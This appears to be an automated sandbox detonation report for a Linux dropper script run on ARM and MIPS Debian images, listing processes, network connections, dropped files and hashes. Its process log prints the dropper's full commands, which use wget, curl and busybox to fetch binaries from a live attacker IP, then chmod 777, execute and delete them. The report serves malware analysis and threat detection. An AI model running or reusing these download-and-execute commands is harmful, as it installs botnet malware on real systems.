[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/chmod
[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/rm
[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.39:443 | 1527653184.rsc.cdn77.org | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 07:02
Reported
2024-11-21 07:05
Platform
debian9-armhf-20240611-en
Max time kernel
25s
Max time network
66s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | N/A |
| N/A | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | N/A |
| N/A | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | N/A |
| N/A | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | N/A |
| N/A | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | N/A |
| N/A | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | N/A |
| N/A | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | N/A |
| N/A | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | N/A |
| N/A | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | N/A |
| N/A | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | N/A |
| N/A | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | N/A |
| N/A | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | N/A |
| N/A | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /usr/bin/curl | N/A |
Processes
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/chmod
[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/rm
[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/wget
[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/chmod
[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/rm
[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/wget
[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/chmod
[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/rm
[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/wget
[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/chmod
[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/rm
[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/wget
[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/chmod
[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/rm
[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/wget
[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/chmod
[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/rm
[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/wget
[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/chmod
[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/rm
[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/wget
[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/chmod
[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/rm
[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/chmod
[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/rm
[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/wget
[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/chmod
[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/rm
[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/chmod
[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/rm
[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/wget
[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/chmod
[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/rm
[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/wget
[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/chmod
[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/rm
[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/wget
[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/727-1-0xb670c000-0xb671d044-memory.dmp
memory/820-2-0xb6740000-0xb6751044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 07:02
Reported
2024-11-21 07:04
Platform
debian9-mipsbe-20240729-en
Max time kernel
74s
Max time network
76s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | N/A |
| N/A | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | N/A |
| N/A | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | N/A |
| N/A | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | N/A |
| N/A | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | N/A |
| N/A | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | N/A |
| N/A | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | N/A |
| N/A | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | N/A |
| N/A | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | N/A |
